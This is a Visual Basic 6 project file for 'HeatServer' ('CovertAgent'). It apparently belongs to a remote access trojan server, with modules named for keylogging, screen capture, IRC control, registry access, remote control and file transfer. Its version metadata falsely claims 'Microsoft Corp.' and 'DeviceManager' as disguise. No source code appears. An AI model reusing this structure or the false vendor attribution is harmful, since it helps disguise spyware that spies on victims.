Type=Exe
Module=modProcess; modProcess.bas
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\WINDOWS\system32\stdole2.tlb#OLE Automation
Module=modDeclare; modDeclare.bas
Module=modMain; modMain.bas
Module=modRegistry; modRegistry.bas
Object={248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0; MSWINSCK.OCX
Module=modKeylog; modKeylog.bas
Module=modIRC; modIRC.bas
Form=frmMain.frm
Form=frmChat.frm
Class=clsFileTransfer; clsFileTransfer.cls
Class=clsDIB; clsDIB.cls
Class=clsPalette; clsPalette.cls
Class=clsZLib; clsZLib.cls
Class=clsRemoteControl; clsRemoteControl.cls
Module=modCapture; modCapture.bas
ResFile32="HeatServer.RES"
IconForm="frmMain"
Startup="Sub Main"
HelpFile=""
Title="CovertAgent"
ExeName32="Cryptech Heat.exe"
Path32="C:\Documents and Settings\Tim\Desktop"
Command32=""
Name="HeatServer"
HelpContextID="0"
CompatibleMode="0"
MajorVer=0
MinorVer=5
RevisionVer=81
AutoIncrementVer=1
ServerSupportFiles=0
VersionCompanyName="Microsoft Corp."
VersionProductName="DeviceManager"
CompilationType=-1
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1

[MS Transaction Server]
AutoRefresh=1
